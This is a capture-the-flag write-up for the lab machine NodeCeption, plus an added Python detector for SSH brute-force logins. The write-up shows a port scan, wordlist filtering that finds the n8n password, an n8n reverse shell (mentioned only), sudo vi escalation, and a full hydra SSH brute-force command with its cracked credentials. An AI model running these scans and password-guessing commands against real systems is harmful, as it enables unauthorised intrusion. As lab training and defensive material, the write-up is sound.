NodeCeption

Information Gathering

192.168.100.57

Port Scan

┌──(root㉿LAPTOP-O235O5EH)-[~]
└─# rustscan -a 192.168.100.57
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Scanning ports faster than you can say 'SYN ACK'

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'.
Open 192.168.100.57:22
Open 192.168.100.57:5678
Open 192.168.100.57:8765
[~] Starting Script(s)
[~] Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-26 14:48 +0800
Initiating ARP Ping Scan at 14:48
Scanning 192.168.100.57 [1 port]
Completed ARP Ping Scan at 14:48, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:48
Completed Parallel DNS resolution of 1 host. at 14:48, 2.50s elapsed
DNS resolution of 1 IPs took 2.50s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 3, CN: 0]
Initiating SYN Stealth Scan at 14:48
Scanning 192.168.100.57 [3 ports]
Discovered open port 22/tcp on 192.168.100.57
Discovered open port 5678/tcp on 192.168.100.57
Discovered open port 8765/tcp on 192.168.100.57
Completed SYN Stealth Scan at 14:48, 0.01s elapsed (3 total ports)
Nmap scan report for 192.168.100.57
Host is up, received arp-response (0.00054s latency).
Scanned at 2026-03-26 14:48:12 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
5678/tcp open rrac syn-ack ttl 64
8765/tcp open ultraseek-http syn-ack ttl 64
MAC Address: 08:00:27:3B:87:02 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 2.64 seconds
Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

Port 5678 is n8n.

Port 8765 serves the Apache default page.

Enumerating 8765

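A hint is given in a comment in the page source.

The email is usuario@maildelctf.com

The password is at least 8 characters long and contains at least 1 digit and 1 uppercase letter.

This is most likely the n8n login account and password.

Next, a candidate password list is needed; here the candidates are extracted from rockyou.
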
head -n 5000 /usr/share/wordlists/rockyou.txt | grep -P '^(?=.*\d)(?=.*[A-Z]).{8,}$'   

Only two of the first 5000 entries match; trying them shows that the first one (Password1) works.

Exploiting n8n

Use an n8n workflow to get a reverse shell.

Privilege Escalation

thl -> root

sudo -l

vi can be used for privilege escalation; GTFOBins also has a method for it.

https://gtfobins.org/gtfobins/vi/

But sudo requires a password.

Brute-forcing with hydra

┌──(root㉿LAPTOP-O235O5EH)-[~]
└─# hydra -l thl -P /usr/share/wordlists/rockyou.txt ssh://192.168.100.57
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-03-26 15:30:38
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.100.57:22/
[22][ssh] host: 192.168.100.57 login: thl password: basketball
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-03-26 15:31:03

thl:basketball
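
How the hydra run above looks from the defender's side, as an added example that is not part of the original write-up: it scans sshd log lines for a login accepted right after a burst of failed passwords from the same source. The log lines, host name, source addresses (192.0.2.x placeholders), threshold and window are all constructed assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sshd log lines (not from the original page). 192.0.2.10 and
# 192.0.2.20 are documentation-range placeholders for the source hosts.
SAMPLE_LOG = "\n".join(
    [f"Mar 26 15:30:{40 + i:02d} target sshd[21{i:02d}]: Failed password for thl "
     f"from 192.0.2.10 port {40100 + i} ssh2" for i in range(8)]
    + ["Mar 26 15:30:49 target sshd[2110]: Accepted password for thl "
       "from 192.0.2.10 port 40120 ssh2",
       # A user who mistypes once and then logs in must not raise an alert.
       "Mar 26 15:40:02 target sshd[2200]: Failed password for thl "
       "from 192.0.2.20 port 51000 ssh2",
       "Mar 26 15:40:09 target sshd[2201]: Accepted password for thl "
       "from 192.0.2.20 port 51002 ssh2"]
)

EVENT = re.compile(
    r"^(?P<ts>\w{3} +\d+ [\d:]{8}) \S+ sshd\[\d+\]: (?P<result>Failed|Accepted) "
    r"password for (?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port \d+"
)

def detect_guessed_logins(log_text, threshold=5, window_s=60, year=2026):
    """Return (src, user, failures) for every accepted login that follows at
    least `threshold` failed passwords from the same source within `window_s`."""
    recent = defaultdict(deque)  # (src, user) -> timestamps of recent failures
    hits = []
    for line in log_text.splitlines():
        m = EVENT.match(line)
        if not m:
            continue
        # Syslog timestamps carry no year, so one is assumed for parsing.
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        q = recent[(m["src"], m["user"])]
        while q and ts - q[0] > timedelta(seconds=window_s):
            q.popleft()  # drop failures that fell out of the window
        if m["result"] == "Failed":
            q.append(ts)
        elif len(q) >= threshold:
            hits.append((m["src"], m["user"], len(q)))
            q.clear()
    return hits

if __name__ == "__main__":
    for src, user, n in detect_guessed_logins(SAMPLE_LOG):
        print(f"ALERT {user}@{src}: login accepted after {n} failed passwords")
```

An alert of this kind means the account's password was guessed, so the response is a credential reset and session review, not only a block of the source address.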